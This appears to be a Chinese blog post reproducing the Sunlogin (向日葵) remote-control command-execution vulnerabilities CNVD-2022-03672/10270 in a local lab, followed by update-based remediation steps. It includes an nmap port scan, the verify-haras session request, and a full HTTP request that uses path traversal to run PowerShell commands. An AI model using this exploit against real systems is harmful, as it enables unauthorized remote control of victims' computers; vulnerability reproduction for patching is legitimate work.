本文仅为验证漏洞,在本地环境测试验证,无其它目的
漏洞编号:
CNVD-2022-03672/CNVD-2022-10270
漏洞说明:
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
2022年2月5日,CNVD公开向日葵简约版存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
2022年2月15日,CNVD公开向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
漏洞影响范围:
- 向日葵个人版 for Windows <= 11.0.0.33
- 向日葵简约版 <= V1.0.1.43315(2021.12)
漏洞级别:
高危
漏洞复现:
此处演示向日葵个人版,简约版没找到旧的安装包
版本:
-
使用nmap扫描工具,扫描向日葵所在目标机IP,查看开放端口:】
nmap -p 40000-65535 192.168.32.129
-
可以看到,部署向日葵的目标机开放了如下端口:
-
依次通过浏览器访问ip+端口,直到出现如下图所示,在此环境中访问49200端口即出现JSON信息:
IP:49200/
-
尝试获取session,先测试目标机器是否存在/cgi-bin/rpc界面,浏览器继续访问:
IP:49200/cgi-bin/rpc
-
测试存在界面后,打开BP,浏览器加BP代理,在BurpSuite中获取刚才访问的界面,选择【Send to Repeater】:
-
修改数据包为POST,并传入数据:action=verify-haras,点击【Send】,即可获取到session:
-
修改数据包,添加session,并修改参数进行命令执行,下方ipconfig可进行修改为其他参数进行测试,例如替换为whoami:
GET /check? cmd=ping../../../Windows/System32/WindowsPowerShell/v1.0/powershell.exe+%20ipconfig HTTP/1.1 Host: 192.168.32.129:54107 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Cookie:CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
漏洞修复:
参考【贝锐】
-
PC端用户可通过官网直接升级到最新版本
-
通过软件检查更新
(1)向日葵远程控制
(2)蒲公英异地组网
(3)花生壳内网穿透
-
开启软件自动更新
向日葵远程控制
- 打开设置
- 选择常规设置
- 找到软件更新选项,并将更新选项修改为:自动更新
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)